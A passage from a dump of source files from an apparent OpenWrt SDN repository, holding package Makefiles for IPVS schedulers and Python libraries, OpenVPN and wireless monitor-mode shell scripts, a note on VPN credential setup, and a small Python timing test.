DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_sed.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_sed)\nendef\n\ndefine KernelPackage/ipvs-sed/description\n The shortest expected delay scheduling algorithm assigns network\n connections to the server with the shortest expected delay. The\n expected delay that the job will experience is (Ci + 1) / Ui if\n sent to the ith server, in which Ci is the number of connections\n on the ith server and Ui is the fixed service rate (weight)\n of the ith server.\nendef\n\n$(eval $(call KernelPackage,ipvs-sed))\n\ndefine KernelPackage/ipvs-nq\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server never queuing scheduling\n KCONFIG:= \\\n CONFIG_IP_VS_NQ\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_nq.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_nq)\nendef\n\ndefine KernelPackage/ipvs-nq/description\n The never queue scheduling algorithm adopts a two-speed model.\n When there is an idle server available, the job will be sent to\n the idle server, instead of waiting for a fast one. When there\n is no idle server available, the job will be sent to the server\n that minimize its expected delay (The Shortest Expected Delay\n scheduling algorithm)\nendef\n\n$(eval $(call KernelPackage,ipvs-nq))\n\ndefine KernelPackage/ipvs-ftp\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server FTP protocol helper\n KCONFIG:= \\\n CONFIG_IP_VS_FTP\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_ftp.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_ftp)\nendef\n\ndefine KernelPackage/ipvs-ftp/description\n FTP is a protocol that transfers IP address and/or port number in\n the payload. In the virtual server via Network Address Translation,\n the IP address and port number of real servers cannot be sent to\n clients in ftp connections directly, so FTP protocol helper is\n required for tracking the connection and mangling it back to that of\n virtual service.\nendef\n\n$(eval $(call KernelPackage,ipvs-ftp))\n\ndefine KernelPackage/ipvs-pe-sip\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server SIP persistence engine\n KCONFIG:= \\\n CONFIG_IP_VS_PE_SIP\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_pe_sip.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_pe_sip)\nendef\n\ndefine KernelPackage/ipvs-pe-sip/description\n Allow persistence based on the SIP Call-I\nendef\n\n$(eval $(call KernelPackage,ipvs-pe-sip))\n\n"
},
{
"alpha_fraction": 0.6947456002235413,
"alphanum_fraction": 0.7214345335960388,
"avg_line_length": 22.05769157409668,
"blob_id": "6f26a1a162b1e70c53721fc40d2558c27d8de630",
"content_id": "747c7936578b0557a5ec02df79a828368a8a38e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1199,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 52,
"path": "/packages/python-tweepy/Makefile",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#\n# Copyright (C) 2012 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\ninclude $(TOPDIR)/rules.mk\n\nPKG_NAME:=tweepy\nPKG_VERSION:=2.1\n#PKG_RELEASE:=2\n\nPKG_SOURCE:=tweepy-$(PKG_VERSION).tar.gz\nPKG_SOURCE_URL:=https://pypi.python.org/packages/source/t/tweepy/\nPKG_MD5SUM:=529819cc8a0b283b7b47470ceb06cd16\n\nPKG_BUILD_DIR:=$(BUILD_DIR)/$(PKG_NAME)-$(PKG_VERSION)\nPKG_BUILD_DEPENDS:=python\n\ninclude $(INCLUDE_DIR)/package.mk\n$(call include_mk, python-package.mk)\n\ndefine Package/python-tweepy\n SUBMENU:=Python\n SECTION:=lang\n CATEGORY:=Languages\n TITLE:=python-tweepy\n URL:=https://github.com/tweepy/tweepy\n DEPENDS:=+python\n MAINTAINER:[email protected]\nendef\n\ndefine Package/python-tweepy/description\n A Python library for accessing the Twitter API\nendef\n\ndefine Build/Compile\n\t$(INSTALL_DIR) $(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)\n\t$(CP) \\\n\t\t$(PKG_BUILD_DIR)/tweepy \\\n \t\t$(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)\nendef\n\ndefine Package/python-tweepy/install\n\t$(INSTALL_DIR) $(1)$(PYTHON_PKG_DIR)\n\t$(CP) \\\n\t\t$(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)/tweepy \\\n\t\t$(1)$(PYTHON_PKG_DIR)\nendef\n\n$(eval $(call BuildPackage,python-tweepy))\n"
},
{
"alpha_fraction": 0.5025906562805176,
"alphanum_fraction": 0.7331606149673462,
"avg_line_length": 37.5,
"blob_id": "f4a79775050adf1292ed7a1d05fb96c63ad9830f",
"content_id": "ebff30a55035aa3ad37f7dc6512858ca41924272",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 386,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 10,
"path": "/packages/iipr/files/etc/openvpn/up2.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nACTION=ifup DEVICE=tun0 INTERFACE=vpn /sbin/hotplug-call iface\n#/sbin/ifconfig tun0 10.8.0.238 pointopoint 10.8.0.237 mtu 1500\n#/etc/openvpn/up.sh tun0 1500 1560 10.8.0.238 10.8.0.237 init\n#/sbin/ifconfig tun0 $4 pointopoint $5 mtu $2\n#/etc/openvpn/up.sh tun0 1500 1542 5.5.227.180 255.255.0.0 init\n/sbin/ifconfig tun0 $4 netmask $5 mtu $2 broadcast 5.5.255.255\n\nexit 0\n\n"
},
{
"alpha_fraction": 0.6404494643211365,
"alphanum_fraction": 0.6779026389122009,
"avg_line_length": 19.538461685180664,
"blob_id": "6868f9fcc470cd5846a160ee07c5473fe5e3a427",
"content_id": "0dedcbb66410bb718ba1717f9316be8485dd7502",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 267,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 13,
"path": "/python/scapy/start_wifi_monitor.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n/etc/init.d/netserver stop\n/etc/init.d/snmpd stop\n/etc/init.d/collectd stop\n/etc/init.d/lldpd stop\n/etc/init.d/openvpn stop\n \ninsmod /lib/modules/3.3.8/rt5572sta.ko\nifconfig ra0 up\niwlist ra0 scan \niwconfig ra0 mode monitor\nfree\n"
},
{
"alpha_fraction": 0.7810361385345459,
"alphanum_fraction": 0.7878788113594055,
"avg_line_length": 39.91999816894531,
"blob_id": "7de4b481ff52c14ad33cfc5bdaae40eb2b79e0d2",
"content_id": "1c4a6592c221accd9466684865f8286460ea184f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1023,
"license_type": "no_license",
"max_line_length": 274,
"num_lines": 25,
"path": "/notes/openvpn-client-providers.md",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "The use case called for L2 VPN with credential authentication which provider ibvpn.net offers. Openwrt by default is not configured to work with this type of configuraion. This is an outline on how the solution was assembled to provide this feature for use with ibvpn.net \n\nConfigure openvpn build\n\n--auth-user-pass [up] \nAuthenticate with server using username/password. up is a file containing username/password on 2 lines OpenVPN will only read passwords from a file if it has been built with the --enable-password-save configure option\n\nIf up is omitted, username/password will be prompted from the console.\n\nAdd directive to .ovpn file\nCreate new file named user.conf and then add your clients username and password\n\n1. Create a txt file on a folder alongside your .ovpn files \n2. Put your user/pass inside the file in two(2) lines, like:\n\nusername\npassword\n\n3. Then save it.\n4. Open up your .ovpn file and add:\n\nauth-user-pass user.conf\n\nTODO:\nluci interface to enter the credentials so CLI access is not required.\n"
},
{
"alpha_fraction": 0.6908904910087585,
"alphanum_fraction": 0.711361289024353,
"avg_line_length": 17.788461685180664,
"blob_id": "1ce33a62cab9671ccf28f1b307bb598cc186716f",
"content_id": "7d3f3be1662dc3deab8b61d2bfbdc5ee45fff98a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 977,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 52,
"path": "/packages/iipr/Makefile",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "# \n# Copyright (C) 2006-2011 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\ninclude $(TOPDIR)/rules.mk\n\nPKG_NAME:=iipr\nPKG_VERSION:=1.0.0\nPKG_RELEASE:=1\n\nPKG_BUILD_DIR := $(BUILD_DIR)/$(PKG_NAME)\n\ninclude $(INCLUDE_DIR)/package.mk\n\ndefine Package/iipr\n SECTION:=utils\n CATEGORY:=Base system\n TITLE:=iipr scripts\n PKGARCH:=all\nendef\n\ndefine Package/iipr/description\n A set of scripts that for the sdn app\nendef\n\ndefine Package/iipr/conffiles\n/etc/uci-defaults/luci-start\nendef\n\ndefine Build/Prepare\nendef\n\ndefine Build/Configure\nendef\n\ndefine Build/Compile\nendef\n\ndefine Package/iipr/install\n\t$(INSTALL_DIR) $(1)\n\tmkdir -p $(1)/etc/uci-defaults\n\t$(CP) ./files/etc/uci-defaults/* $(1)/etc/uci-defaults/\n\tmkdir -p $(1)/etc/config/\n\t$(CP) ./files/etc/config/* $(1)/etc/config/\n\tmkdir -p $(1)/etc/openvpn\n\t$(CP) ./files/etc/openvpn/* $(1)/etc/openvpn/\nendef\n\n$(eval $(call BuildPackage,iipr))\n"
},
{
"alpha_fraction": 0.6829059720039368,
"alphanum_fraction": 0.7256410121917725,
"avg_line_length": 21.941177368164062,
"blob_id": "305360ab301746d17ffc13118153bd60333b7c13",
"content_id": "f843214e3d32fe236cf112e209449a51042913ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1170,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 51,
"path": "/packages/python-wifi/Makefile",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#\n# Copyright (C) 2008-2011 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\ninclude $(TOPDIR)/rules.mk\n\nPKG_NAME:=python-wifi\nPKG_VERSION:=0.5.0\nPKG_RELEASE:=1\n\n#http://downloads.sourceforge.net/project/pythonwifi.berlios/python-wifi-0.5.0.tar.bz2?r=&ts=1388036164&use_mirror=softlayer-dal\n\nPKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.gz\nPKG_SOURCE_URL:=@SF/python-wifi\nPKG_MD5SUM:=eec19df59fd75ba5a136992897f8e468\n\nPKG_BUILD_DEPENDS:=python\n\ninclude $(INCLUDE_DIR)/package.mk\n$(call include_mk, python-package.mk)\n\ndefine Package/python-wifi\n SUBMENU:=Python\n SECTION:=lang\n CATEGORY:=Languages\n TITLE:=python-wifi\n URL:=http://python-wifi.sourceforge.net\n DEPENDS:=+python-mini\nendef\n\ndefine Package/pyserial/description\n wifi extensions in pure python\nendef\n\ndefine Build/Compile\n\t$(call Build/Compile/PyMod,., \\\n\t\tinstall --prefix=\"/usr\" --root=\"$(PKG_INSTALL_DIR)\", \\\n\t)\nendef\n\ndefine Package/pyserial/install\n\t$(INSTALL_DIR) $(1)$(PYTHON_PKG_DIR)\n\t$(CP) \\\n\t $(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)/* \\\n\t $(1)$(PYTHON_PKG_DIR)/\nendef\n\n$(eval $(call BuildPackage,python-wifi))\n"
},
{
"alpha_fraction": 0.5218703150749207,
"alphanum_fraction": 0.5580694079399109,
"avg_line_length": 18.47058868408203,
"blob_id": "f7f60f281cbb57230cf2f62987cb4da9637b03b8",
"content_id": "8b0a3480e3ca7eab5eb25e549462ccaa3e641772",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 663,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 34,
"path": "/python/scapy/timeit-test.py",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\nimport timeit\nfrom timeit import Timer, timeit, repeat\n\nlst = range(100)\n\ndef f1(lst):\n out = []\n for item in lst:\n out.append(lst[lst.index(item)])\n return out\n \ndef f2(lst):\n return [item for item in lst]\n \ndef test():\n c=0\n for i in range(100):\n c=i-c\n return c\n \nprint(test())\n\nprint(__name__)\nTimeIt = timeit(\"test()\", setup=\"from __main__ import test\", number=100000)\nRepeat = repeat(\"test()\", setup=\"from __main__ import test\", repeat=3, number=100000)\nprint(TimeIt)\nprint(Repeat, min(Repeat))\n\n \n# %timeit f1(lst)\n \n# %timeit f2(lst)\n\n"
}
] | 26 |
irvega/ptavi-p3
|
https://github.com/irvega/ptavi-p3
|
6e276314f0f5b4885ce9e96a5cb754d73f481822
|
737de3890d969171582d43110d2b9f396267f39d
|
f1af2e584a8eba5cea81344e37d25e0d185dae9c
|
refs/heads/master
| 2021-07-13T08:08:26.893277 | 2017-10-16T12:17:47 | 2017-10-16T12:17:47 | 106,249,158 | 0 | 0 | null | 2017-10-09T07:16:03 | 2016-09-29T07:35:46 | 2017-10-03T13:15:15 | null |
[
{
"alpha_fraction": 0.5725768208503723,
"alphanum_fraction": 0.5782505869865417,
"avg_line_length": 29.65217399597168,
"blob_id": "8868e4b61ac02283c93831bb59a578c1a21dfd0c",
"content_id": "c47a2b747153363cd14f32b96e615ee7a110ebd3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2115,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 69,
"path": "/karaoke.py",
"repo_name": "irvega/ptavi-p3",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom xml.sax import make_parser\nfrom xml.sax.handler import ContentHandler\nfrom smallsmilhandler import SmallSMILHandler\nimport json\nfrom urllib.request import urlretrieve\n\nif len(sys.argv) != 2:\n sys.exit(\" Usage: python3 karaoke.py file.smil\")\ntry:\n open(sys.argv[1])\nexcept FileNotFoundError:\n sys.exit(' This file not found, try again')\n\n\nclass KaraokeLocal(SmallSMILHandler):\n def __init__(self):\n parser = make_parser()\n sHandler = SmallSMILHandler()\n parser.setContentHandler(sHandler)\n parser.parse(open(sys.argv[1]))\n self.lista = sHandler.get_tags()\n \"\"\"\n Lee fichero e imprime atributos y elementos\n \"\"\"\n\n def __str__(self):\n liststr = ''\n for etiquetasD in self.lista:\n liststr += etiquetasD['name']\n for atribt in etiquetasD:\n if etiquetasD[atribt] != \"\" and atribt != 'name':\n liststr += \"\\t\" + atribt + '=\"' + etiquetasD[atribt] + '\"'\n liststr += \"\\n\"\n return(liststr)\n \"\"\"\n Recorre la lista donde guardo el fichero y la imprime por filas\n \"\"\"\n def to_json(self, fichsmil, fichjson=''):\n if fichjson == '':\n fichjson = fichsmil.split('.')[0] + '.json'\n with open(fichjson, 'w') as fijson:\n json.dump(self.lista, fijson)\n \"\"\"\n Convierte el fichero .smil en .json\n \"\"\"\n\n def do_local(self):\n for etiquetasD in self.lista:\n for atribt in etiquetasD:\n if etiquetasD[atribt][0:7] == 'http://':\n long_atrib = etiquetasD[atribt]\n short_atrib = etiquetasD[atribt].split('/')[-1]\n urlretrieve(long_atrib, short_atrib)\n etiquetasD[atribt] = short_atrib\n \"\"\"\n Guarda los archivos en local y cambia el nombre de directorio a fichero\n \"\"\"\n\nif __name__ == \"__main__\":\n objeto = KaraokeLocal()\n print(objeto)\n objeto.to_json(sys.argv[1])\n objeto.do_local()\n objeto.to_json(sys.argv[1], 'local.json')\n print(objeto)\n"
}
] | 1 |
JellyWong/Uranus
|
https://github.com/JellyWong/Uranus
|
794b265b5e684f233409ac7240261e82abbfaf01
|
afbdae12f986099e65c84b50fdae4f999c68b91f
|
2d6fdbd9f4a1e9414ef3be4d0f65e0389c3fcc10
|
refs/heads/master
| 2021-01-21T14:52:26.823656 | 2017-07-03T16:35:56 | 2017-07-03T16:35:56 | 95,346,172 | 0 | 0 | null | 2017-06-25T07:54:26 | 2017-06-25T04:26:44 | 2017-06-25T07:34:58 | null |
[
{
"alpha_fraction": 0.6272673010826111,
"alphanum_fraction": 0.6369343996047974,
"avg_line_length": 31.898361206054688,
"blob_id": "5171ff5d0909c6ed8985f300e4d818e5b74480f7",
"content_id": "209452fd4f416be61b37e0ed4f69d6ed29b83174",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10586,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 305,
"path": "/app/teacher/utils.py",
"repo_name": "JellyWong/Uranus",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# define your utility function here\nimport os\nfrom datetime import datetime\nfrom openpyxl import *\nfrom app.models import *\nfrom django.shortcuts import get_object_or_404\nfrom app.utils import *\nfrom app.utils.logUtils import *\nfrom app.teacher.entities import *\nfrom django.core.exceptions import *\n\n\ndef handle_uploaded_file(request,course_id,f):\n teacher=get_object_or_404(User,username=request.user.username)\n file=File(course_id=course_id,time=datetime.now(),file=f,user=teacher)\n file.save()\n\n\ndef import_student_for_course(request):\n course_id = request.POST.get('course_id', None)\n f = request.FILES['file']\n name = f.name\n if isXls(name):\n path = os.path.join(UPLOAD_ROOT, name)\n with open(path, 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n wb = load_workbook(filename=path)\n sheet = wb.active\n ids = []\n for i in range(2, 10000):\n if sheet['A' + str(i)] is None:\n break\n else:\n ids.append(sheet['A' + str(i)])\n students_to_course(ids, course_id)\n os.remove(path)\n return 'import students for course success'\n else:\n return 'upload file must be a xls or xlsx excel'\n\n\ndef students_to_course(students_id, course_id):\n User.objects.filter(role='student', course_id=course_id).delete()\n course = Course.objects.get(id=course_id)\n for id in students_id:\n student = User.objects.get(username=id)\n enroll = Enroll(course=course, user=student)\n enroll.save()\n\n\ndef add_homework(homework_form, course_id, username,file):\n content = homework_form.cleaned_data['content']\n proportion = homework_form.cleaned_data['proportion']\n submits = homework_form.cleaned_data['submits']\n endTime = homework_form.cleaned_data['endTime']\n title=homework_form.cleaned_data['title']\n teacher = get_object_or_404(User, username=username)\n workmeta = WorkMeta(course_id=course_id, user=teacher, content=content,title=title,\n proportion=proportion, submits=submits, startTime=datetime.now(), endTime=endTime)\n workmeta.save()\n if file is not None:\n f=File(course_id=course_id,user=teacher,file=file,type='text',time=datetime.now())\n f.save()\n attachment = Attachment(file=f, workMeta=workmeta, type='workmeta')\n attachment.save()\n\n\n# 获取一个老师往期课程的所有作业\ndef get_past_homeworks(username):\n teacher = get_object_or_404(User, username=username)\n enrolls = Enroll.objects.filter(user__username=teacher.username)\n homeworks = []\n present = datetime.now()\n for enroll in enrolls:\n course = enroll.course\n if course.endTime.replace(tzinfo=None) <= present:\n workmetas = WorkMeta.objects.filter(course_id=course.id)\n homeworks.extend(workmetas)\n return homeworks\n\n#获取当前学期\ndef get_now_term():\n now_term = Term.objects.all().order_by('-id')[0]\n return now_term\n\n\n# 获取团队成绩表的完整路径名\ndef get_team_score_excel_file_abspath():\n now_term = get_now_term()\n\n # 第一次计算出各团队得分之后保存到excel表,以便老师下载\n # 各个团队得分的excel命名规范:termYear_termsemester_team_score_list.xlsx\n file_path = os.path.join(REPORT_ROOT, 'teamScores')\n if not os.path.exists(file_path):\n os.mkdir(file_path,)\n file_name = '' + str(now_term.year) + str(now_term.semester) + '_team_score_list.xlsx'\n file = os.path.join(file_path, file_name)\n return file\n\n\n# 获取学生成绩表的excel的完整路径名\ndef get_stu_score_excel_file_abspath():\n now_term = get_now_term()\n\n # 各人得分的excel命名规范:termYear_termsemester_stu_score_list.xlsx\n file_path = os.path.join(REPORT_ROOT, 'stuScores')\n if not os.path.exists(file_path):\n os.mkdir(file_path,)\n file_name = '' + str(now_term.year) + str(now_term.semester) + '_stu_score_list.xlsx'\n file = os.path.join(file_path, file_name)\n return file\n\n# 获取所有的团队学生表的excel的完整路径名\ndef get_team_members_all_excel_file_abspath():\n now_term = get_now_term()\n\n # 团队成员表的excel命名规范:termYear_termsemester_stu_teams.xlsx\n file_path = os.path.join(REPORT_ROOT, 'stuTeams')\n file_name = '' + str(now_term.year) + str(now_term.semester) + '_stu_teams.xlsx'\n file = os.path.join(file_path, file_name)\n return file\n\n# 保存所有的学生和团队信息到excel\ndef create_stu_teams_excel(file,course):\n work_book = Workbook()\n team_stu_list = reportTeams(course)\n ws = work_book.get_active_sheet()\n print(team_stu_list)\n\n ws.cell(row=1, column=1).value = '团队id'\n ws.cell(row=1, column=2).value = '团队名称'\n ws.cell(row=1, column=3).value = '队长'\n ws.cell(row=1,column=4).value = '队员'\n\n for i in range(0,len(team_stu_list)):\n num = i + 2\n ws.cell(row=num, column=1).value = team_stu_list[i]['id']\n ws.cell(row=num, column=2).value = team_stu_list[i]['name']\n ws.cell(row=num, column=3).value = team_stu_list[i]['leader'].user.name\n column_index = 4\n for member in team_stu_list[i]['member']:\n ws.cell(row=num, column=column_index).value = member.user.name\n column_index += 1\n work_book.save(filename=file)\n\n\n# 保存团队得分表到excel\ndef create_team_score_excel(file, team_list, score_list):\n work_book = Workbook()\n ws = work_book.get_active_sheet()\n ws.cell(row=1, column=1).value = '团队id'\n ws.cell(row=1, column=2).value = '团队名称'\n ws.cell(row=1, column=3).value = '分数'\n\n for i in range(0,len(team_list)):\n num = i+2;\n ws.cell(row=num, column=1).value = team_list[i].serialNum\n ws.cell(row=num, column=2).value = team_list[i].name\n ws.cell(row=num, column=3).value = score_list[i]\n work_book.save(filename=file)\n\n\ndef create_stu_score_excel(file, stu_list, stu_score_dict):\n work_book = Workbook()\n ws = work_book.get_active_sheet()\n ws.cell(row=1, column=1).value = '学号'\n ws.cell(row=1, column=2).value = '姓名'\n ws.cell(row=1, column=3).value = '分数'\n\n print(stu_list)\n print(stu_score_dict)\n num = 2\n for stu in stu_list:\n ws.cell(row=num, column=1).value = stu.username\n ws.cell(row=num, column=2).value = stu.name\n ws.cell(row=num, column=3).value = stu_score_dict[stu]\n num += 1\n work_book.save(filename=file)\n\n\n\n#计算团队得分\ndef compute_team_score():\n # now_term = get_now_term()\n team_list = get_team_list_in_now_course()\n score_list = []\n team_score = {}\n for team in team_list:\n work_list = Work.objects.filter(team=team)\n score = 0\n for work in work_list:\n score += (work.score or 0.0) * (work.workMeta.proportion or 0.0)\n team_score[team] = round(score,2)\n score_list.append(score)\n return team_list, score_list, team_score\n\n\n# 计算个人总得分 dict: key=team_member, value=score\ndef compute_stu_score():\n x, y, team_score = compute_team_score()\n stu_score = {}\n for team in team_score:\n team_member = Member.objects.filter(team=team)\n for member in team_member:\n score = (team_score[team] or 0.0) * (member.contribution or 0.0)\n stu_score[member.user] = round(score,2)\n return stu_score\n\n\n\n# 获取当前学期的所有team,并排序\ndef get_team_list_in_now_course():\n now_time = datetime.now()\n now_course = Course.objects.get(startTime__lt=now_time, endTime__gt=now_time)\n if now_course:\n team_list = Team.objects.filter(course=now_course).order_by('serialNum')\n return team_list\n\n\n# 获取当前学期所有参加的学生,并按学号排序\ndef get_stu_list_in_now_course():\n team_list = get_team_list_in_now_course()\n members_list = []\n for team in team_list:\n team_member = Member.objects.filter(team=team)\n members_list.extend(team_member)\n stu_list = []\n for member in members_list:\n stu_list.append(member.user)\n stu_list = sorted(stu_list, key=lambda x : x.username)\n return stu_list\n\n\n# 读取file文件\ndef file_iterator(file_name, chunk_size=512):\n with open(file_name, 'rb') as f:\n while True:\n c = f.read(chunk_size)\n if c:\n yield c\n else:\n break\n\n\n# 获取某一门课程中没有团队的学生\ndef query_unteamed_students(course_id):\n course=get_object_or_404(Course, id=course_id)\n enrolls=Enroll.objects.filter(course=course,user__role='student')\n unteamed_students=[]\n for enroll in enrolls:\n try:\n member=Member.objects.get(user=enroll.user)\n except:\n unteamed_students.append(enroll.user)\n return unteamed_students\n\n\n# 生成所有团队的所有成绩报表\ndef generate_team_scores(course_id):\n course=get_object_or_404(Course,id=course_id)\n workmetas=WorkMeta.objects.filter(course=course)\n teams=Team.objects.filter(course=course,status='passed')\n datas=[]\n for workmeta in workmetas:\n works=[]\n for team in teams:\n work=Work.objects.filter(workMeta=workmeta,team=team).order_by('-time').first()\n if work is None:\n work=Work(score=0,team=team)\n works.append(work)\n row_data=ScoreWrapper(workmeta=workmeta,works=works)\n datas.append(row_data)\n return datas\n\n\ndef generate_scores_excel(course_id):\n data=generate_team_scores(course_id)\n wb=Workbook()\n dest=os.path.join(REPORT_ROOT,'teams_scores_'+str(course_id)+'.xlsx')\n ws1=wb.active\n ws1.title='团队成绩报表'\n ws1['A1']='作业标题\\团队'\n ws1['A'+str(len(data)+3)]='加权总成绩'\n teams=Team.objects.filter(course_id=course_id,status='passed')\n\n for i in range(len(teams)):\n ws1.cell(row=1,column=i+2,value=teams[i].name)\n\n for i in range(len(data)):\n ws1.cell(row=i+2,column=1,value=data[i].workmeta.title)\n works=data[i].works\n for j in range(len(works)):\n ws1.cell(row=i+2,column=j+2,value=works[j].score)\n\n # 根据每次作业的权重,计算总成绩\n for i in range(len(teams)):\n sum=0\n for j in range(len(data)):\n weight=data[j].workmeta.proportion\n sum+=weight*data[j].works[i].score\n ws1.cell(row=len(data)+3,column=i+2,value=sum)\n wb.save(filename=dest)\n return dest\n"
},
{
"alpha_fraction": 0.6916578412055969,
"alphanum_fraction": 0.695881724357605,
"avg_line_length": 26.852941513061523,
"blob_id": "618fdb671b751d659585a94e2fa99cdb2bd661de",
"content_id": "7223eb893f3f347f0909b562b96d1baf9df13d6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 971,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 34,
"path": "/app/utils/attendanceUtils.py",
"repo_name": "JellyWong/Uranus",
"src_encoding": "UTF-8",
"text": "from app.utils.logUtils import log, LOG_LEVEL\nfrom datetime import datetime\nfrom app.models import *\n\n# 关于签到的工具集\n# by kahsolt\n\n\ndef showToday():\n startTime = datetime(datetime.now().year, datetime.now().month, datetime.now().day, 9, 0, 0, 0)\n endTime = datetime.now()\n attendances = Attendance.objects.filter(time__range=(startTime, endTime)).order_by('time')\n return attendances\n\n\ndef showTimeBetween(startTime, endTime):\n if not isinstance(startTime, datetime) or not isinstance(endTime, datetime):\n return None\n\n attendances = Attendance.objects.filter(time__range=(startTime, endTime)).order_by('time')\n return attendances\n\n\ndef addAttendance(user):\n if not isinstance(user, User):\n return None\n if user.role != 'student':\n log('不是学生', 'attendanceUtils', LOG_LEVEL.ERROR)\n return False\n\n attendence = Attendance()\n attendence.user = user\n attendence.save()\n return attendence\n"
},
{
"alpha_fraction": 0.5625,
"alphanum_fraction": 0.5625,
"avg_line_length": 12,
"blob_id": "293cab1afbfdc7691db8317bc42ee64a5efd228b",
"content_id": "6e26057208d5ee0faa711a96f548ea08640dbb17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 138,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 5,
"path": "/resource/uploads/README.txt",
"repo_name": "JellyWong/Uranus",
"src_encoding": "UTF-8",
"text": "[文件上传:作业附件/讲义资源]\n 导入学生/老师的xls\n 老师资料上传\n 学生作业上传\n 所有!!!"
}
] | 3 |
iamvinaysridhar/Data-Science-Process-Pipeline-using-Machine-Learning-Algorithms
|
https://github.com/iamvinaysridhar/Data-Science-Process-Pipeline-using-Machine-Learning-Algorithms
|
d172d6c57a48ebe53d6615b7ca9290985b2aa90c
|
a03bc5598053ba6bcba33df52537cb4ad16507d4
|
6ea7e74eaf9b5586c4557d8de3adfe0db4df0a11
|
refs/heads/main
| 2023-08-23T11:17:35.345758 | 2021-09-28T17:10:09 | 2021-09-28T17:10:09 | 411,370,553 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6184696555137634,
"alphanum_fraction": 0.6205804944038391,
"avg_line_length": 23.18666648864746,
"blob_id": "5ade2842f396ad4de626c5c77067eadca050ffb3",
"content_id": "8d430740fa162f7bb2db3427386cb1c4549e288b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1895,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 75,
"path": "/Prediction.py",
"repo_name": "iamvinaysridhar/Data-Science-Process-Pipeline-using-Machine-Learning-Algorithms",
"src_encoding": "UTF-8",
